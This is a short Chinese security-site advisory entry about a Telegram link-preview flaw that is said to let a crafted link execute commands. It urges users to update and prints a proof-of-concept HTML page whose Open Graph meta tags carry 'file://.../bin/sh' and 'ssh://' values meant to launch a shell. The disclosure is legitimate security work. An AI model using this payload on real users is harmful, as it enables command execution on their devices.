首页 > 知识 > 修改
【页面双击滚屏】
标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-2669]   作者: ecawen 发表于: [2020-05-19]

本文共 [490] 位读者顶过

Telegram 是啥不多说:看到了的赶紧更新吧。[出自:jiwo.org]
详情看GitHub:https://github.com/Metnew/telegram-links-nsworkspace-open
给你发送一个超链接,包含恶意嵌套代码标签,导致命令执行。
POC 如下:
    
	
	
  1. 
		<html>
	
    2. 

	
  2. 
		 
	
    3. 

	
  3. 
		</head>
	
    4. 

	
  4. 
		 <!--<meta property="og:url"   content="%A0file://google.com/bin/sh" /> Keybase-->
	
    5. 

	
  5. 
		 <meta property="og:url" content="file://google.com/bin/sh" />
	
    6. 

	
  6. 
		 <meta property="og:type" content="article" />
	
    7. 

	
  7. 
		 <meta property="og:title" content="file://google.com/bin/sh ssh://google.com/x" />
	
    8. 

	
  8. 
		 <meta property="og:description" content="ssh://google.com/x file://google.com/bin/sh? " />
	
    9. 

	
  9. 
		</head>
	
    10. 

	
  10. 
		 
	
    11. 

	
  11. 
		</html>
	
    12.

评论

暂无
发表评论
 返回顶部 
热度(490)
 关注微信 
v1.4 by jiwo@jiwo.org   Copyright © 2016-2046 机窝安全   
京ICP备16002041号-2